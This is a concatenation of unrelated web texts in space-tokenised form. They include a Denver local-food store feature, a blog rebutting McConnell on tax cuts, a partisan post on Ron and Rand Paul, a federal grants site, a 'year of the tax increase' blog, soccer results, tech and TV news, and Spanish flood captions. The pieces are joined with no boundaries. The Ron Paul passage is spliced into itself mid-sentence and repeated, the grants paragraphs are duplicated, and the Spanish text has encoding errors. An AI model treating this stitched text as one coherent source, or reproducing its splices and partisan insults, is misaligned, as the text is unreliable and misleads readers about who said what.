Every available item is grown and made within 250 miles of the store , 3210 Wyandot St .
“ Even the bread is made from wheat grown in Colorado and milled in Colorado , ” says store co-owner Shannon McLaughlin .
A conversation at a Broncos preseason game prompted McLaughlin and In Season co-owner Todd Stevenson to open the 180 - square - foot space in north Denver .
The two wanted to make buying local easier than at large groceries .
“ Weeding through the things that are n’t local is frustrating , ” Stevenson says , leading to the store ’s motto : “ If it ’s not from here , it ’s not in here . ”
Defining “ local ”
Some local - food purists , or “ locavores , ” argue for 100 miles as a truly “ local ” radius , but Stevenson wanted to quantify “ local ” in more pragmatic terms .
“ I have a ’96 4 - Runner , and 250 miles is how far I can go on a tank of gas , ” Stevenson says .
The distance brings variety to the shelves , too .
“ I want peaches in the summer , ” McLaughlin says , and Western Slope fruit falls conveniently within his prescribed radius .
In Season sparks the interest of sustainable food advocate Michael Brownlee .
“ I think it ’s terrific , ” says Brownlee , co-founder and catalyst of the Boulder - based Transition Colorado , an organization dedicated to re-localizing economies .
He says eating local is n’t an “ ascetic discipline ” but a way for people take back a bone - deep tradition of agriculture and community .
In an effort to buy products from sustainable sources , Stevenson and McLaughlin visit all their suppliers looking for quality practices and humane treatment of the livestock .
Store walls sport photos of farmers , and McLaughlin keeps pictures of the cows and pigs intended for future food on her phone .
All this builds a sense of trust in their customers , Stevenson said .
“ When you walk in , all the questions of where it ’s from , how the people treat the animals and the land is stripped away , ” he said .
It ’s a message that resonates with many shoppers .
“ It ’s nice to come here and know it ’s local , ” said Christina Wright , a regular customer .
“ Plus everyone is so sweet and friendly , ” she says , pushing back out into a cloudy afternoon .
Community - minded
In Season partners with other businesses promoting local foods and plans to sponsor a nearby farmers market this summer .
They also offer discounts to business owners purchasing large quantities of local foods .
Two moms , toddlers in tow , shake raindrops from their jackets and chat with Stevenson about using In Season foods for their upcoming baby - food - making classes .
“ I love it , ” says Abby Hoverstock , another In Season regular .
As Hoverstock enters , McLaughlin swings open the door to a cooler , squirts her locally grown radishes with water and greets Hoverstock and her son by name as they dart in from the rain .
Hoverstock pulls empty milk bottles from her canvas bag and shushes her son , clambering to have the bottles weighed on a produce scale hung behind the counter .
McLaughlin ’s laugh drifts through the shop as she weighs the bottles for the boy and offers him a honey stick .
“ How many stores can you go to where the people pay attention ? ” Hoverstock says .
Early success
The shop opened in January , perhaps the hardest time of the year to find fresh produce , to brisk sales .
“ We ’ve had an amazing positive response , ” McLaughlin says .
So much so it ’s hard to keep the shelves stocked some days .
“ The whole store turns over in less than a week and some things every three days , ” Stevenson says .
The Noosa yogurt and fresh milk hit just about everyone ’s basket .
One woman popped in for the first time just to pick up some Fort Collins - produced MouCo Cheese Co. Inc. cheese .
With products moving so quickly , and stocked shelves dependent on the growing season , shopping at In Season calls for a different mind - set .
“ It requires more flexibility and participation on the part of our customers , ” McLaughlin said .
She demonstrates by negotiating with a woman buying a dozen bottles of heavy whipping cream for a dinner event , asking her to take only 10 because another customer just called wanting the thick cream for his wife ’s birthday dessert .
McLaughlin wants to be sure she has some .
“ You ’re not going to come in and find Twinkies , or some modified version , on the shelf , ” he said , but that adds to the store ’s honesty .
McLaughlin admits she can’t cook without things like lemons and bananas .
She gets hers elsewhere .
The two plan to offer online ordering and home delivery in coming months , Stevenson said .
Bikes pulling trailers modified as “ flatbeds ” will transport the groceries .
Cathy Vigil breezes into the store from her home a mile away as the spring rain lets up .
There she buys everything from produce and dairy to Colorado - produced gifts for out - of - town friends .
She hopes the concept sticks .
“ I ’m in here constantly , and I think there should be more stores like this , ” Vigil said .
Heather McWilliams : 303-954-1698 or hmcwilliams@denverpost.com
In Season Local Market
3210 Wyandot St. ; 720-282-4834
Open Hours : Weekdays 2 p.m.-8 p.m. ; weekends 10 a.m.-6 p.m.
Facebook : facebook.com /inseason .
Includes updates of available produce and products , plus details on special events .
Website : inseasonlocalmarket.com
This final podcast deals with a few recent Supreme Court decisions revolving around the fact that religious free exercise trumps every other single right ever .
Brought to you by the Christian Nationalists of our Supreme Court .
To help us navigate this pure applesauce , our guest is Geoff Blackwell , litigation consultant for American Atheists and purveyor of the legal movie analysis podcast Not So Grand Jury .
Please donate to American Atheists to help them continue to fight the good fight , and if you ’re going to whore after other podcasts , Not So Grand Jury is a good choice .
So Westboro Baptist Church picketed Comic - Con for " worshipping false idols . "
And Comic - Con picketed back .
Playing the role of an " embedded journalist " I got stuck in … shouting with the microphone " I find your lack of faith … disturbing . "
Anyway , here 's how the whole event went down .
The Westboro crew were outnumbered , outgunned and police - protected .
And a mixture of organised groups , independently motivated individuals and , let 's be honest = , one or two wackos , let them know how we felt .
God loves Gay Robin indeed …
A Little History
Founded in 1977 and a second generation family owned business we continue our ethos of honest , value for money , and complete customer satisfaction .
Our head office in South Yorkshire gives us excellent transport links throughout the UK and our door is always open should you wish to pay us a visit or see your product in manufacture .
All of our team , from Sales and Design to Manufacturers and Site Engineers , place the utmost importance in your satisfaction .
Made in the UK
We are the only UK seating manufacturer to not only source up to 70 % of our raw materials locally , but also manufacture everything at our head office in Rotherham , South Yorkshire .
Keeping everything under one roof gives us complete control , from initial concept and design to installation and project handover .
You can be safe in the knowledge that your product is in experienced hands .
Attention to Detail
Within all our ranges there is the flexibility to customise your seating to make it the perfect fit and completely unique .
With 40 years ’ experience and thousands of successful projects to draw from we have a depth of knowledge that is the envy of our industry , just take a look at our case studies .
Ongoing Support
Whilst our seating is designed to require minimal maintenance , our service team are always on hand for parts , servicing or to answer questions .
We offer phone and email troubleshooting , servicing contracts and emergency call out support , ensuring you get the assistance you need .
Design and Manufacture
To maintain the highest quality and accuracy , we continually invest in the latest technology and have a host of CNC machines and robotic welders at our disposal , we can design and manufacture standard or customized high quality seating solutions that meets your exacting requirements .
Installation
McConnell : ' No evidence whatsoever that the Bush tax cuts actually diminished revenue '
There are fiscal theories that I disagree with , and that I think are cruel , and that make me upset .
But very few actually make me sad .
Sen .
Mitch McConnell , however , hit my sore spot today .
" There 's no evidence whatsoever that the Bush tax cuts actually diminished revenue , " he told Brian Beutler of TPMDC .
" They increased revenue because of the vibrancy of these tax cuts in the economy .
So I think what Senator Kyl was expressing was the view of virtually every Republican on that subject . "
In other words , this is why Republicans do n't think tax cuts need to be paid for .
They pay for themselves .
Why does this make me sad ?
Because it 's hard to see the country prospering when one of its two major political parties is this economically illiterate .
McConnell is n't some backbencher .
He 's Senate minority leader .
And he thinks there 's " no evidence whatsoever that the Bush tax cuts actually diminished revenue . "
There 's an ontological question here about what , exactly , McConnell considers to be " evidence . "
But how about the Congressional Budget Office 's estimations ?
" The new CBO data show that changes in law enacted since January 2001 increased the deficit by $ 539 billion in 2005 .
In the absence of such legislation , the nation would have a surplus this year .
Tax cuts account for almost half — 48 percent — of this $ 539 billion in increased costs . "
How about the Committee for a Responsible Federal Budget ?
Their budget calculator shows that the tax cuts will cost $ 3.28 trillion between 2011 and 2018 .
How about George W. Bush 's CEA chair , Greg Mankiw , who used the term " charlatans and cranks " for people who believed that " broad - based income tax cuts would have such large supply - side effects that the tax cuts would raise tax revenue . "
He continued : " I did not find such a claim credible , based on the available evidence .
I never have , and I still do n't . "
There is some stimulative affect from tax cuts .
They increase economic activity somewhat , and that means there 's somewhat more taxable revenue for the government to pick up .
But not much .
Not nearly enough to cancel out the cost of a tax cut .
It 's important to remember that the Laffer Curve is actually a curve .
You can no more drop taxes to 1 percent and make up the difference in revenue than you could increases taxes to 100 percent and sustain enough economic activity to fund the government .
You 'll recall that the last time we saw budget surpluses was under Clinton -- and higher taxes .
Further , if tax cuts do n't need to be paid for because they generate so much taxable economic activity that they pay for themselves , then neither do unemployment checks .
After all , the two work very similarly : A tax cut puts more money in your pocket .
Unemployment insurance puts more money in an unemployed person 's pocket .
The difference is that the unemployed person is likelier to spend that money , which will generate more taxable economic activity than if that money is saved .
That 's why Mark Zandi , an adviser to John McCain 's presidential campaign , estimated ( pdf ) that a dollar spent extending the Bush tax cuts would generate .32 cents of taxable economic activity , while a dollar spent on unemployment benefits would generate $ 1.61 of taxable economic activity .
In other words , using the theory under which tax cuts pay for themselves , unemployment benefits are a lot likelier to pay for themselves .
But John Cornyn , another member of the GOP 's Senate leadership , has n't run the numbers .
" I think the urgency of deficit - neutral extension of unemployment insurance has increased because of the size of the deficit and the size of the debt , " he said .
It 's enough to make you very , very sad .
Photo credit : By J. Scott Applewhite / Associated Press
Time to expose the origins of this myth .
Back in 1973 , when the first Bic disposable lighter was introduced , it was only available in two colors .
Black and White .
Back then the entire lighter was one solid color , unlike today where no matter the color of the lighter , the bottom is white .
So when using a black lighter to smoke pot , the ash from packing the bowl down would not be visible .
Unlike the white lighter that would show " evidence of illicit drug use " ( that 's the excuse the cops would use to detain you ) .
Nowadays all lighters have a white bottom piece , so no one color should be considered bad luck .
Now that being said ... I still believe in the White Lighter Myth , simply because the only time I 've ever possessed a white Bic lighter I had a string of bad luck .
A friend had left a white lighter in my car , so used it to light a cig , not five minutes later I get rear - ended .
To add insult to injury my bong was in the trunk and had been completely destroyed by the accident .
Get home , grab my other car , drive to my friends house ( the one that left the white lighter in my car ) and I run out of gas ( the gauge showed a full tank ) .
I called my buddy to bring some gas , when he showed up i told him everything that had happened and blamed it all on his stupid lighter .
He denied ownership of said white lighter .
Should I use Python 2 or Python 3 for my development activity ?
Python 3 is strongly recommended for any new development .
As of January 2020 , Python 2 has reached End Of Life status , meaning it will receive no further updates or bugfixes , including for security issues .
Many frameworks and other add on projects are following a similar policy .
As such , we can only recommend learning and teaching Python 3 .
Historical information
For historical information that may be useful in porting or maintaining remaining Python 2 systems , please see previous page revisions .
Many of the ones who did n't vote are back home running for office , like Dan Boren ( Blue Dog - OK ) , whose primary is tomorrow ; Pete Hoekstra ( R - MI ) and Zach Wamp ( R - TN ) , busy losing gubernatorial primaries in Michigan and Tennessee ; Adam Putnam ( R- FL ) , running for State Agriculture Commissioner of Florida ; and Meek ( D - FL ) , Moran ( R- KS ) , Hodes ( D - NH ) and Tiahart ( R - KS ) , all running for Senate .
Others , like John Shadegg ( R - AZ ) , Gresham Barrett ( R- SC ) , Vern Ehlers ( R - MI ) , Parker Griffith ( R - AL ) , Patrick Kennedy ( D - RI ) and Bart Stupak ( D - MI ) , either are retiring or have lost primaries and are being retired and no longer care enough to bother coming in to work .
Several are prowling K Street lining up new jobs as lobbyists .
But Ron Paul ( R - TX ) , of course , fits none of those categories .
I had a hunch .
I looked to see what the next vote was .
And sure enough , a few minutes later Ed Markey 's H.R. 3101 , the Twenty - first Century Communications and Video Accessibility Act , came up for a vote .
It was opposed by a gaggle of far right - wing loons -- cranks like Virginia Foxx ( R- NC ) , Scott Garrett ( R- NJ ) , Steve King ( R- IA ) , Tom Price ( R- GA ) , John Campbell ( R- CA ) , Trent Franks ( R - AZ ) , Tom McClinton ( R - CA ) and ... Ron Paul .
I knew it !
It must have been humiliating for Ron with his crackpot son having denounced a piece of legislation that has made the lives of millions of Americans much richer and fuller and given them the freedom and liberty he 's always squawking about but seems to think only belongs to wealthy white " normal " males .
Earlier in the day Kentucky Attorney General Jack Conway was hailing the anniversary and the legislation at a nonpartisan rally on Lexington .
" Twenty years ago today , " he told the crowd , " when President George H. W. Bush signed the Americans with Disabilities Act and ' let the shameful wall of exclusion finally come tumbling down , ' we made our country stronger and our people more equal and free .
Today , working together , we can continue to improve the lives of those with disabilities . "
His campaign released a press release blasting Rand Paul 's position against the bill :
Jack Conway understands the importance of this landmark civil rights legislation , which , since its enactment on July 26 , 1990 , has served as a bill of rights , helping over 50,000,000 Americans with disabilities to more actively engage their communities and seek out the American Dream .
Further , Jack Conway recognizes the ADA 's importance to Kentucky .
Kentucky is the state with the third largest percentage of non-institutionalized , working aged people with disabilities .
These individuals depend on the ADA to help safeguard their rights , including the right to seek employment , to utilize public accommodations , and to access basic public services .
By contrast , Jack Conway 's opponent Rand Paul has repeatedly expressed his disgraceful opposition to key provisions in the ADA , putting the rights of businesses over the rights of disabled American citizens .
He even suggested that businesses employing disabled persons confined to a wheelchair should not be required to comply with federal standards and maintain an elevator , suggesting instead that the employer simply " get them a job on the first floor . "
Jack Conway will stand up for Americans with disabilities -- our friends , neighbors and fellow citizens .
This must have been terribly But Ron Paul ( R - TX ) , of course , fits none of those categories .
I had a hunch .
I looked to see what the next vote was .
And sure enough , a few minutes later Ed Markey 's H.R. 3101 , the Twenty - first Century Communications and Video Accessibility Act , came up for a vote .
It was opposed by a gaggle of far right - wing loons -- cranks like Virginia Foxx ( R- NC ) , Scott Garrett ( R- NJ ) , Steve King ( R- IA ) , Tom Price ( R- GA ) , John Campbell ( R- CA ) , Trent Franks ( R - AZ ) , Tom McClinton ( R - CA ) and ... Ron Paul .
Iit !
It must have been humiliating for Ron with his crackpot son having denounced a piece of legislation that has made the lives of millions of Americans much richer and fuller and given them the freedom and liberty he 's always squawking about but seems to think only belongs to wealthy white " normal " males .
Earlier in the day Kentucky Attorney General Jack Conway was hailing the anniversary and the legislation at a nonpartisan rally on Lexington .
" Twenty years ago today , " he told the crowd , " when President George H. W. Bush signed the Americans with Disabilities Act and ' let the shameful wall of exclusion finally come tumbling down , ' we made our country stronger and our people more equal and free .
Today , working together , we can continue to improve the lives of those with disabilities . "
His campaign released a press release blasting Rand Paul 's position against the bill :
This must have been terribly embarrassing for Jeb Bush , who found himself stuck hosting a fundraiser today for the son of another politician , a non-certified eye doctor in Kentucky .
I just could n't resist taking note of the fact that this evening the House voted 377-0 to recognize and honor the 20th anniversary of the enactment of the Americans with Disabilities Act of 1990 .
The rules were suspended and it had to be agreed to by 2/3 of the House .
This happened at 6:42 pm .
No one voted against it .
That was odd .
Did pathetic little Rand Paul even get abandoned by his father ?
Ron Paul was one of 55 members who did n't vote .
Labels : Americans With Disabilities Act , Jack Conway , Kentucky , Rand Paul , Ron Paul
BEIJING , July 3 ( Reuters ) - A Chinese court on Saturday sentenced a Tibetan environmentalist who organized villagers to pick up litter and plant trees to five years in jail for inciting to split the nation , his lawyer said .
The environmentalist , Rinchen Samdrup , is the third brother in his family to be jailed .
Mr. Samdrup ran an environmental group in the Tibet Autonomous Region near Sichuan Province that organized about 1,700 local villagers to reforest the area and report poaching , and also ran a small magazine .
His group worked with international conservation groups and was praised by Chinese media .
Exile Tibetan groups say Mr. Samdrup ran afoul of powerful local interests after accusing a local police officer of poaching .
Mr. Samdrup was accused of posting a favorable article about the Dalai Lama on his website , his lawyer , Xia Jun , said .
He pleaded not guilty
But the Chamdo prefecture court convicted him of incitement to split the country , the lawyer said , and deprived him of his political rights for three years .
He has 10 days to appeal .
Jon Benjamin ’s superlative voice was recently nominated for Outstanding Voice - Over Performance for its bravura performance on the animated FX spy series Archer , and Comedy Central has just booked its owner for Jon Benjamin Has a Van .
The funny network has ordered ten episodes of the sketch comedy series — executive produced by Benjamin , Andrew Steele , and Funny or Die — in which Benjamin will hit the street as an investigative report on the hunt for human interest stories .
Hit the jump for the full press release .
Even if the name is unfamiliar , odds are that animation fans would recognize Benjamin ’s sultry baritone .
In addition to Archer , Benjamin is a regular on Adult Swim , having voiced characters on Home Movies , Aqua Teen Hunger Force , The Venture Bros , Lucy : Daughter of the Devil , and ( in syndication ) Family Guy .
The comedian is already in the Comedy Central family as a writer / co- star on Important Things with Demetri Martin .
Fox plans to debut Bob ’s Burgers at midseason , which will re-team Benjamin with Home Movies creator Loren Bouchard .
With series now on Fox , FX , and Comedy Central , it looks like Benjamin will be somewhere on TV year - round .
I could n’t be happier .
Here ’s the press release :
Pos. Group A W L T SO Pts GD 1 D.C. United 2 0 1 1 8 +2 2 Chicago 1 0 2 1 6 +1 3 Colorado 1 1 1 0 4 0 4 San Jose 0 3 0 0 0 - 3 Pos. Group B W L T SO Pts GD 1 Columbus 2 0 1 1 8 +2 2 Seattle 1 1 1 1 5 0 3 Philadelphia 1 1 1 0 4 0 4 FC Dallas 0 2 1 0 1 - 2 Pos. Group C W L T SO Pts GD 1 Houston 3 0 0 0 9 +6 2 Chivas USA 2 1 0 0 6 +3 3 New England 1 2 0 0 3 0 4 Toronto FC 0 3 0 0 0 - 9 Pos. Group D W L T SO Pts GD 1 Real Salt Lake 2 0 1 1 8 +3 2 NY Red Bulls 1 1 1 1 5 +1 3 Kansas City 1 2 0 0 3 - 3 4 LA Galaxy 0 1 2 0 2 -1
30 - minute halves Friday / Saturday
35 - minute halves Monday
no substitute re-entry
ties broken by shootout
Shootout W = 1 additional point
Schedule
July 23
DC 1 vs. CHI 1 ( DC won 5 - 3 on penalty kicks )
COL 3 vs. SJ 2
FCD 1 vs. SEA 1 ( Seattle won 4 - 3 on penalty kicks )
CLB 1 vs. PHI 1 ( Columbus won 4 - 3 on penalty kicks
HOU 3 vs. TOR 0
CHV 1 vs. NE 0
KC 2 vs. LA 1
RSL 2 vs. NY 1
July 24
6:30 p.m .
DC 2 vs. COL 1
FCD 1 vs. CLB 2
NE 1 vs. HOU 3
LA 1 vs. RSL 1 ( RSL won on penalty kicks )
8 p.m.
CHI 1 vs. SJ 0
SEA 2 vs. PHI 1
CHV 3 vs. TFC 0
KC 0 vs. NY 2
July 26 - halves are 35 minutes each
Group B - 6 p.m .
SEA 0 vs. CLB 1
PHL 1 vs. FCD 0
Group C - 6 p.m .
CHV 0 vs. HOU 1
TOR 2 vs. NE 5
Group A - 7:45 p.m.
CHI 2 vs. COL 2 ( CHI won on penalty kicks )
SJ 0 vs. DC 1
Group D - 7:45 p.m.
KC 0 vs. RSL 2
NY 1 vs. LA 1 ( NY won on penalty kicks )
July 27
Semifinals - Carl Lewis
6 p.m. DC 3 , CLB 0
7:45 p.m. RSL 1 , HOU 1 ( RSL won on PKs )
Consolation - Centennial Park
5th -8th
6 p.m. CHI vs. SEA
6 p.m. CHV vs. NY
9th - 12th
6 p.m. COL vs. PHI
7:45 p.m. NE vs. KC
13th -16th
7:45 p.m. SJ 4 , FCD 4
7:45 p.m. TFC vs. LA
July 29
Final - Robertson Stadium
9:15 a.m. DC 0 , RSL 0 ( DC won on PKs )
All other matches postponed due to field conditions .
This is quite the odd combination that seems to have come straight from the depths of nowhere .
Augen – a company I ’ve never even heard of until today – is looking to offer their Android - based tablet for K - Mart shoppers later on this week .
The device – being dubbed the GenTouch78 – has a 7 - inch capacitive touchscreen , Android 2.1 ( yes , this is an Android tablet with a fairly recent version of Android ) , an 800MHz CPU , 256MB of RAM , 2GB of internal memory , WiFi , and more .
The device will be market - enabled and will run you for about $ 150 .
If these unofficial - looking official press shots are anything to go by , then the user interface on these things have had no customization whatsoever : stock Android through and through .
That may not sit well with some of you who ’d like to use all of that real estate to its full advantage ( there ’s no customization to employ a widget and icon grid larger than 4×4 ) .
For $ 150 it may not be everything you ’ve always dreamt your Android tablet to be , but it ’s a start .
We ’ll let you guys know if someone can manage to find this thing in a K - Mart store sometime this week .
[ via Engadget ]
Sadly , he 's still going to get some people to click on that link .
If you catch a BBlooper on a web site , do a screen capture and send it in .
NEW YORK , July 9 ( UPI ) -- A New York high school fired two female teachers who were found one recent evening allegedly drunk and at least partially naked in a classroom , officials said .
New York High School Superintendent Linda Waite 's report of the Nov. 20 incident said James Madison High School French teacher Cindy Mauro , 34 , and Spanish teacher Alini Brito , 30 , were found in a classroom at 8:50 p.m. by maintenance workers , the New York Daily News reported Friday .
Advertisement
Waite said the workers reported seeing " a woman lying on the floor naked from the waist up " and a school safety officer summoned to the classroom said the women were " naked , " with one " on her knees " and one " lying on the floor . "
The superintendent said the teachers appeared drunk , displaying slurred speech , red eyes and difficulty walking without stumbling .
Waite said there were students in the building at the time of the incident , as the annual SING !
competition was underway .
Mark Nussbaum , an attorney for Mauro and Brito , said the teachers have requested a formal hearing to contest the allegations .
Federal Grants
The FederalGrants.com mission is to inform the general public about federal grants offered by the United States government .
We strive to provide accurate information on how to find and qualify for a grant , how to apply for a grant , and how to proceed once you are approved .
The Federal Grant search engine allows access to the requirements , deadlines , and details of over 60,000 past and current grants from 500 + different federal agencies .
Find a Federal Grant
Utilize our Utilize our Grant Search to search for federal grants by keyword or by Catalog of Federal Domestic Assistance ( CFDA ) Number .
You can also browse Federal Grants based on the Government Agency or the Specific Grant Category
What are Federal Grants ?
There is a multitude of misinformation and misunderstanding about federal grants on the internet and on television .
It is extremely important to fully understand what government grants are before you spend valuable time and money searching for grant sources or looking for a grant writer .
There is a multitude of misinformation and misunderstanding about federal grants on the internet and on television .
It is extremely important to fully understand what government grants are before you spend valuable time and money searching for grant sources or looking for a grant writer .
Read More >>
Federal Grants for Women
Simply being a woman does n't ensure you will qualify for a federal grant .
There are many more qualifications needed , including having a business or non-profit organization geared towards helping women and an established track record of service .
Simply being a woman does n't ensure you will qualify for a federal grant .
There are many more qualifications needed , including having a business or non-profit organization geared towards helping women and an established track record of service .
Read More >>
Federal Housing Grants
Up to $ 1 billion in housing grants are available through HUD .
Communities in need of help to spur economic growth and development may qualify for HUD grants .
Individuals are typically not granted assistance , however help may be available through local government and organizations .
Up to $ 1 billion in housing grants are available through HUD .
Communities in need of help to spur economic growth and development may qualify for HUD grants .
Individuals are typically not granted assistance , however help may be available through local government and organizations .
Read More >>
Federal Grants for Small Businesses
The U.S. Government does not generally award federal grants to private for - profit small businesses .
Typically only non-profit agencies benefit from these grants .
There are some exceptions , so researching thoroughly what options are available is the first step towards securing a grant for your small business .
The U.S. Government does not generally award federal grants to private for - profit small businesses .
Typically only non-profit agencies benefit from these grants .
There are some exceptions , so researching thoroughly what options are available is the first step towards securing a grant for your small business .
Read More >>
Federal Pell Grant
Pell Grants are awarded directly to college students who meet the established criteria .
The purpose of the Federal Pell Grant program is to promote access to postsecondary education for low - income citizens .
The amount awarded is based on the individual 's financial need .
Pell Grants are awarded directly to college students who meet the established criteria .
The purpose of the Federal Pell Grant program is to promote access to postsecondary education for low - income citizens .
The amount awarded is based on the individual 's financial need .
Read More >>
How to Apply for a Federal Grant
Applying for a federal grant can often be the most daunting task of all .
Before beginning this process many steps are necessary , including ensuring your readiness , making sure you meet all of the qualifications , and planning the writing process .
Applying for a federal grant can often be the most daunting task of all .
Before beginning this process many steps are necessary , including ensuring your readiness , making sure you meet all of the qualifications , and planning the writing process .
Read More >>
How to Find , Evaluate , and Hire a Grant Writer
Writing your grant request takes not only practice but knowledge of the process .
Often times finding a grant writer is more beneficial to organizations than attempting to write the grant yourself .
Referrals , references , and research are all important steps to ensuring you find a capable grant writer .
Writing your grant request takes not only practice but knowledge of the process .
Often times finding a grant writer is more beneficial to organizations than attempting to write the grant yourself .
Referrals , references , and research are all important steps to ensuring you find a capable grant writer .
Read More >>
The Truth About Free Federal Grants
We debunk the " free grant " myth you hear on late night TV commericals .
The truth about free federal grants is there are no free federal grants !
The United States government does n't give away free grant money for individuals to buy a home or pay bills , so do n't worry , you 're not missing out .
We debunk the " free grant " myth you hear on late night TV commericals .
The truth about free federal grants is there are no free federal grants !
The United States government does n't give away free grant money for individuals to buy a home or pay bills , so do n't worry , you 're not missing out .
Read More >>
2011 : The Year Of The Tax Increase
Unless the U.S. Congress acts , there is going to be a massive wave of tax increases in 2011 .
In fact , some are already calling 2011 the year of the tax increase .
A whole host of tax cuts that Congress established between 2001 and 2003 are set to expire in January unless Congress chooses to renew them .
But with Democrats firmly in control of both houses that appears to be extremely unlikely .
2011 : The Year Of The Tax Increase
These tax increases are going to affect every single American ( at least those who actually pay taxes ) .
But this will be just the first wave of tax increases .
Another huge slate of tax increases passed in the health care reform law is scheduled to go into effect by 2019 .
So Americans that are already infuriated by our tax system are only going to become more frustrated in the years ahead .
The reality is that the U.S. government will soon be digging much deeper into our wallets .
The following are some of the tax increases that are scheduled to go into effect in 2011 ....
1 - The lowest bracket for the personal income tax is going to increase from 10 percent to 15 percent .
2 - The next lowest bracket for the personal income tax is going to increase from 25 percent to 28 percent .
3 - The 28 percent tax bracket is going to increase to 31 percent .
4 - The 33 percent tax bracket is going to increase to 36 percent .
5 - The 35 percent tax bracket is going to increase to 39.6 percent .
6 - In 2011 , the death tax is scheduled to return .
So instead of paying zero percent , estates of $ 1 million or more are going to be taxed at a rate of 55 percent .
7 - The capital gains tax is going to increase from 15 percent to 20 percent .
8 - The tax on dividends is going to increase from 15 percent to 39.6 percent .
9 - The " marriage penalty " is also scheduled to be reinstated in 2011 .
It is being estimated that the total cost of these tax increases to U.S. taxpayers will be $ 2.6 trillion through the year 2020 .
Ouch !
But wait , there are even more tax increases coming .
The " health care reform law " contains over a dozen new taxes that will be implemented in stages over the next decade .
When you add all of these taxes to the taxes that were mentioned earlier , the result is going to be absolutely devastating .
According to an analysis by the Congressional Joint Committee on Taxation the health care reform law will generate $ 409.2 billion in additional taxes by the year 2019 .
Double ouch !
So is it any wonder why the public has such a low opinion of the U.S. Congress ?
Every single major poll done on the topic shows that approval ratings for Congress are at record lows .
For example , Gallup 's 2010 Confidence in Institutions poll found Congress ranking dead last out of the 16 institutions rated this year .
Of course there are a whole host of reasons why the American people are upset with Congress , but one of the big ones is the fact that we are literally being taxed to death .
However , it is not just federal income taxes that are killing us .
In a previous article entitled " Taxed Enough Already ! " , we listed just a few of the taxes that Americans have to pay each year ....
Accounts Receivable Tax
Building Permit Tax
Capital Gains Tax
CDL license Tax
Cigarette Tax
Corporate Income Tax
Court Fines ( indirect taxes )
Dog License Tax
Federal Income Tax
Federal Unemployment Tax ( FUTA )
Fishing License Tax
Food License Tax
Fuel permit tax
Gasoline Tax
Gift Tax
Hunting License Tax
Inheritance Tax
Inventory tax IRS Interest Charges ( tax on top of tax )
IRS Penalties ( tax on top of tax )
Liquor Tax
Local Income Tax
Luxury Taxes
Marriage License Tax
Medicare Tax
Payroll Taxes
Property Tax
Real Estate Tax
Recreational Vehicle Tax
Road Toll Booth Taxes
Road Usage Taxes ( Truckers )
Sales Taxes
School Tax
Septic Permit Tax
Service Charge Taxes
Social Security Tax
State Income Tax
State Unemployment Tax ( SUTA )
Telephone federal excise tax
Telephone federal universal service fee tax
Telephone federal , state and local surcharge taxes
Telephone minimum usage surcharge tax
Telephone recurring and non-recurring charges tax
Telephone state and local tax
Telephone usage charge tax
Toll Bridge Taxes
Toll Tunnel Taxes
Traffic Fines ( indirect taxation )
Trailer registration tax
Utility Taxes
Vehicle License Registration Tax
Vehicle Sales Tax
Watercraft registration Tax
Well Permit Tax
Workers Compensation Tax
Are you dizzy yet ?
The reality is that the American people are being drained in dozens and dozens of different ways .
But what did you expect ?
Did you think that our politicians would pile up the biggest debt in the history of the world and never ask you to pay for it ?
Did you think that we could run deficits equivalent to about 10 percent of GDP without ever seeing tax increases ?
The truth is that the U.S. government needs a whole lot more money than even these new tax increases will bring in .
After all , it is being projected that the U.S. government will be spending $ 2 trillion on the interest on the national debt alone by the year 2020 .
To put that in perspective , the entire budget for the U.S. government is less than $ 4 trillion for 2010 .
Are you starting to get the picture ?
In the years ahead the IRS is going to be digging deeper and deeper into our pockets and a gigantic chunk of that money is going to go directly into the pockets of those who own our debt .
But very few Americans wanted to listen when this problem was actually somewhat fixable 20 or 30 years ago .
So now we are all going to pay the price - literally .
Michael Snyder
The Economic Collapse
Toyota New Zealand says a small number of Kiwi owners may be affected by the Japanese carmaker 's recall of four models of its Lexus luxury car due to steering problems , its latest move in a series of massive recalls .
The recall is likely to cover about 4500 cars in Japan and 3800 cars in the United States .
The total could reach 11,500 worldwide , Toyota spokeswoman Mieko Iwasaki said .
The models in question were also sold in Europe and China .
The models covered by the recall are the LS460 and LS460L , and hybrids LS600h and LS600hL .
However , the number of those models sold in New Zealand were very low , Lexus New Zealand national manager Debbie Pattullo told NZPA today .
" It might be just one or two customers involved but we are awaiting for confirmation from Japan and then we will go ahead with the upgrade .
" The LS models are in the higher end of Lexus models , so there are very few sold to customers . "
The company said at issue was an option called the " variable gear ratio steering " system that puts the steering wheel back in a centred position after certain manoeuvres were made .
The recall is the latest in a series of recalls and incidents that have tarnished Toyota 's reputation for quality .
The carmaker has recalled more than eight million Toyota and Lexus vehicles worldwide in 2009 and this year , including 6.5 million in the United States , mainly due to complaints about unintended acceleration .
- With Reuters
El Consulado General de Estados Unidos en Nuevo Laredo prev� que la infraestructura se volver� a abrir el 10 de julio , pero que depende de las condiciones
La Coordinación General de Protección Civil del gobierno federal alertó a 17 estados de la República mexicana de la posibilidad de lluvias fuertes acompañadas por tormentas eléctricas Hilda Fernández
La península de Yucatán fue afectada por el mal clima derivado de la onda tropical 12 y un canal de baja presión , y pronostican cielo nublado para el miércoles Silvia Hernández
En algunos casos la ayuda debe de ser enviada a través de cuerdas porque algunos municipios de Tamaulipas están incomunicadas Roberto Aguilar / EL UNIVERSAL
Las crecidas de los ríos en la zona forzaron a las autoridades de México y EU a cerrar por tres días el puente internacional < i> Puerta a las Américas < / i> Especial
Debido a las fuertes precipitaciones que se pronostican para el país , las autoridades dan prisa al deahogo de presas a tope , tal es el caso de la Venustiano Carranza en Nuevo León Notimex
Calderón aseguró que ayudarían a los estados de Nuevo León , Tamaulipas y Coahuila , además externó su pesame a las familias de las 15 personas que fallecieron a consecuencia de este meteoro EL UNIVERSAL
Autoridades dieron la alerta en río Bravo por el incremento del caudal por las fuertes lluvias que han azotado no sólo al DF , sino a la mayor parte del país EL UNIVERSAL
Autoridades de Laredo , Texas , Nuevo Laredo y la Comisión Internacional de Límites y Aguas llevan a cabo una reunión de emergencia en la ciudad texana , debido a la creciente del río Bravo y analizar las medidas que se tomarán AP
El Consulado General de Estados Unidos en Nuevo Laredo prevé que la infraestructura se volverá a abrir el 10 de julio , pero que depende de las condiciones AP
Las oficinas de la aduana de México se encuentran a metros de que el agua penetre al interior , luego que el Río Bravo aumentó considerablemente su cauce AP
Varias personas evacuan sus hogares en la comunidad de Santa Cruz Amilpas , en Oaxaca , tras las inundaciones provocadas por el desbordamiento del Río Salado EFE
